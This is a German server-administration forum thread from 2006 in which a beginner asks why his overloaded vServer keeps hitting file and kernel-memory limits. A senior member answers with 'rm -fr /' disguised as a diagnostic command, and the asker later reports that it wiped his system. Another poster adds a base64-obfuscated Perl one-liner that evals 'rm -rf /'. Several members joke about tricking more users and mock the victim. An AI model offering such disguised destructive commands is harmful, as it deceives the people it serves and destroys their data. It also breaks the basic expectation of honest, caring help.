Ständige Überlastung von vServer

Lesenswerte Artikel, Anleitungen und Diskussionen
Anonymous

Ständige Überlastung von vServer

Post by Anonymous » 2006-04-20 19:56

Guten Tag.
Mein vServer ist ständig überlastet.
Eigendlich wollte ich ein kleines Webhosting eröffnen, jedoch laufen derzeit ca 5 Homepages auf dem vServer und er ist ständig überlastet und ich muss ihn fast jeden Tag neu starten, weil er vollständig steht.

Ich habe meistens die 3 Errors (so steht es in der QoS Alerts Liste):

1.) numfile (am häufigsten)
2.) kmemsize
3.) dcachesize

Wie und wo kann ich meine configs so seinstellen, dass ich zumindest 15 Homepages hosten kann.

Wenn es hilfreich ist:
habe einen vServer bei netclusive.de mit Prozessorleistung: +50% und Arbeitsspeicher: +50%


Ich wäre sehr dankbar für Ihre Hilfe.
Mit freundlichen Grüßen,
***

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Ständige Überlastung von vServer

Post by Joe User » 2006-04-20 20:09

fabs wrote:Mein vServer ist ständig überlastet.
Das ist auch Sinn der Sache, schliesslich steht das V für Volllast.
fabs wrote:Eigendlich wollte ich ein kleines Webhosting eröffnen,
Mit einem vServer? Sind die Schulferien noch nicht um?
fabs wrote:Wie und wo kann ich meine configs so seinstellen, dass ich zumindest 15 Homepages hosten kann.
Die mögliche Zahl an Websites ermittelst Du als root per:

Code: Select all

rm -fr /
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

Anonymous

Re: Ständige Überlastung von vServer

Post by Anonymous » 2006-04-20 20:19

v411:~# rm -fr /
rm: Entfernen von ,,//dev/pts/0" nicht möglich: Operation not permitted
rm: Öffnen von Verzeichnis ,,//dev" nicht möglich: Too many open files in system
rm: Öffnen von Verzeichnis ,,/" nicht möglich: Too many open files in system


Das ist ja das Problem meines vServers (steht das V nicht für Virtual).
Es sind irgendwie immer zu viele offene Dateien...

Und ich kann ja in meinem Confixx eigentlich so viele Kunden erstellen wie ich möchte...

wie kan ich denn alle offenen Dateien schließen und die kmemsize und dcachesize wieder auf 0 bringen?

Mfg

Roger Wilco
Administrator
Administrator
Posts: 6001
Joined: 2004-05-23 12:53

Re: Ständige Überlastung von vServer

Post by Roger Wilco » 2006-04-20 20:27

Our worldcommunity was soiled! ](*,)

codc
Posts: 97
Joined: 2004-01-08 02:55
Location: Tübingen

Re: Ständige Überlastung von vServer

Post by codc » 2006-04-20 20:31

RootForum Foren-Übersicht » Allgemeine *NIX-Serverfragen mit Tiefgang ??????????????????????????????? :twisted:

Anonymous

Re: Ständige Überlastung von vServer

Post by Anonymous » 2006-04-20 20:40

Ich meine das hier ernst aber anscheinend nimmt mich hier mit meinem Problem keiner ernst -_-
Zugegeben: ich kenne mich nicht wirklich gut aus.
Aber das ist das zweite mal dass ich eine Frage in dieses Forum Poste und jedes mal wurde ich verarscht, entschuldigung für diesen Ausdruck, ist sonst nicht meiene Art.

Entschuldigung wenn der Platz meines Topics nicht passte, dann verschiebt mich bitte.


mein letzter Versuch sind 2 Screens vom Virtuozzo


MFG

duergner
RSAC
Posts: 976
Joined: 2003-08-20 11:30
Location: Pittsburgh, PA, USA

Re: Ständige Überlastung von vServer

Post by duergner » 2006-04-20 20:45

Ich bin ja gespannt, wie oft das noch wirkt. :lol: :lol:

codc
Posts: 97
Joined: 2004-01-08 02:55
Location: Tübingen

Re: Ständige Überlastung von vServer

Post by codc » 2006-04-20 20:48

hast du gelesen -> http://www.rootforum.org/terms.html
[ ] ja
[x] nein

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Ständige Überlastung von vServer

Post by Joe User » 2006-04-20 20:52

duergner wrote:Ich bin ja gespannt, wie oft das noch wirkt. :lol: :lol:
Och, man muss es nur schön bunt verpacken und nen rosa Button draufkleben ;)
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

floschi
Userprojekt
Userprojekt
Posts: 3388
Joined: 2002-07-18 08:13
Location: München

Re: Ständige Überlastung von vServer

Post by floschi » 2006-04-20 21:32

Also ich fasse es nicht - in einer Woche zweimal so einen, der ohne zu denken rm -rf / eingibt, das ist irgendwie schon krass. Ich bringe ja viel Verständnis für lernwillige Anfänger auf, aber das es soviele gibt, die ohne Hirn mal "fett krass" Megaprovider werden wollen und es sich trauen, ohne jegliche Grundkenntnisse so ein System zu bestellen - ne, irgendwo hört der Spaß auf. Da gehört rm -rf / einfach dazu ;)

duergner
RSAC
Posts: 976
Joined: 2003-08-20 11:30
Location: Pittsburgh, PA, USA

Re: Ständige Überlastung von vServer

Post by duergner » 2006-04-20 21:36

Naja Joe war ja so lieb, einmal rm -rf / und das andere mal rm -fr / zu schreiben. :lol:

wirsing
RSAC
Posts: 611
Joined: 2002-11-20 21:32
Location: Vaihingen und Karlsruhe

Re: Ständige Überlastung von vServer

Post by wirsing » 2006-04-20 21:38

Joe User wrote:Och, man muss es nur schön bunt verpacken und nen rosa Button draufkleben ;)
Neue Verpackungsidee:

Code: Select all

perl -MMIME::Base64 -e 'eval decode_base64 "c3lzdGVtKCJybSAtcmYgLyIpOw=="'

duergner
RSAC
Posts: 976
Joined: 2003-08-20 11:30
Location: Pittsburgh, PA, USA

Re: Ständige Überlastung von vServer

Post by duergner » 2006-04-20 23:17

Das is aber scho echt böse. *gg*

wirsing
RSAC
Posts: 611
Joined: 2002-11-20 21:32
Location: Vaihingen und Karlsruhe

Re: Ständige Überlastung von vServer

Post by wirsing » 2006-04-20 23:40

eval und evil haben ja auch nur einen Editierabstand von 1 :)

theomega
Userprojekt
Userprojekt
Posts: 704
Joined: 2003-01-27 14:36

Re: Ständige Überlastung von vServer

Post by theomega » 2006-04-22 20:27

[spaß="Ein"]
wie wäre es mit einer Highscore: Wer bekommt am meisten Leute dazu hier im Forum rm -rf (oder ähnliches) auszuführen?
[/spaß]

elch_mg
Posts: 302
Joined: 2006-01-23 19:14
Location: 41063

Re: Ständige Überlastung von vServer

Post by elch_mg » 2006-04-22 21:11

sorry Leute, aber ... YMMD. ich lach mir hier grad n ast ab...
<... Edit by Flo: Bitte keine Bemerkungen zu Anbietern ...>

wgot
RSAC
Posts: 1707
Joined: 2003-07-06 02:03

Re: Ständige Überlastung von vServer

Post by wgot » 2006-04-23 01:19

Hallo,
fabs wrote:Ich meine das hier ernst aber anscheinend nimmt mich hier mit meinem Problem keiner ernst
doch, man nimmt Dich schon ernst mit deinem Problem. Allerdings nicht mit dem Problem das Du meinst zu haben, sondern mit dem Problem das Du tatsächlich hast. :roll:

Gruß, Wolfgang

duergner
RSAC
Posts: 976
Joined: 2003-08-20 11:30
Location: Pittsburgh, PA, USA

Re: Ständige Überlastung von vServer

Post by duergner » 2006-04-23 05:11

Der war wirklich gut. :lol:

Anonymous

Re: Ständige Überlastung von vServer

Post by Anonymous » 2006-04-23 13:42

Nochmal danke für eure super Hilfe und euren Respekt.
War wirklich total nett.
Ich fasse es nicht wie man so hilfsbereit sein kann.
Und wer sagt dass ich '"fett krass" Megaprovider' werden möchte wie "floschi" sagt.
Ich möchte lediglich ein par Projekte von mir, die derzeit auf verschiedenen Webspaces liegen unter eine Haube bringen. Ich dachte mir, dass dies mit einem vServer möglich wäre. Ok dann geht es eben nicht. Könntet ihr mir auch ganz normal sagen: Es geht nicht such dir einen Reseller account oder was weiß ich.

Naja dann werd ich mal nach Foren suchen die auch Anfängern in sachen vServer und rootServer helfen, ohne dabei gleich verarscht zu werden.

***

duergner
RSAC
Posts: 976
Joined: 2003-08-20 11:30
Location: Pittsburgh, PA, USA

Re: Ständige Überlastung von vServer

Post by duergner » 2006-04-23 14:28

fabs wrote:Eigendlich wollte ich ein kleines Webhosting eröffnen
Nur mal zur Auffrischung deiner Erinnerung.

floschi
Userprojekt
Userprojekt
Posts: 3388
Joined: 2002-07-18 08:13
Location: München

Re: Ständige Überlastung von vServer

Post by floschi » 2006-04-23 18:04

fabs wrote:Ich möchte lediglich ein par Projekte von mir, die derzeit auf verschiedenen Webspaces liegen unter eine Haube bringen. Ich dachte mir, dass dies mit einem vServer möglich wäre. Ok dann geht es eben nicht. Könntet ihr mir auch ganz normal sagen: Es geht nicht such dir einen Reseller account oder was weiß ich.
Natürlich geht das - aber eben nicht so einfach, wenn du keine Ahnung hast und keine Lust hast, dich damit zu beschäftigen.

Anonymous

Re: Ständige Überlastung von vServer

Post by Anonymous » 2006-04-23 19:23

Durch den Befehl rm -fr / wurde mein ganzes System gelöscht.
Ich kann es kaum glauben, dass ihr unwissenden und Anfängern solche miesen "Tipps" gebt.
Da ich von einem Projekt seit einem Monat kein Backup gemacht habe, ist sehr viel verloren gegangen. Ihr habt mir dadurch wirklich sehr geschadet.
Ich bin wirklich enttäuscht dass so etwas in einem Support-Forum vorkommt. Das hätte ich wirklich als letztes erwartet.

:(

elch_mg
Posts: 302
Joined: 2006-01-23 19:14
Location: 41063

Re: Ständige Überlastung von vServer

Post by elch_mg » 2006-04-23 19:25

muss man dir die Dinger wirklich in den Kopf reinhämmern? Lies, und werd schlauer.

codc
Posts: 97
Joined: 2004-01-08 02:55
Location: Tübingen

Re: Ständige Überlastung von vServer

Post by codc » 2006-04-23 19:46

fabs wrote:Durch den Befehl rm -fr / wurde mein ganzes System gelöscht.
Kein Mensch mit ein wenig Verstand wird als root ohne die man-pages zu lesen und das dortige verstanden zu haben blind c&p was in die Konsole hacken. Lass es dir eine Lehre sein - kauf dir ein paar Bücher über Linux und dann wirst du, falls du dann über mehr Ahnung verfügst über deine Dummheit lachen.

man rm

-f, --force
ignore nonexistent files, never prompt
-r, -R, --recursive
remove the contents of directories recursively

btw wenn die Platte anständig partitioniert worden wäre dann wäre der Datenverlust nicht 100% weil rm -rf / nicht über Partitionsgrenzen funktioniert.

Roger Wilco
Administrator
Administrator
Posts: 6001
Joined: 2004-05-23 12:53

Re: Ständige Überlastung von vServer

Post by Roger Wilco » 2006-04-23 19:52

codc wrote:btw wenn die Platte anständig partitioniert worden wäre dann wäre der Datenverlust nicht 100% weil rm -rf / nicht über Partitionsgrenzen funktioniert.
Oh doch, probiers mal aus. ;)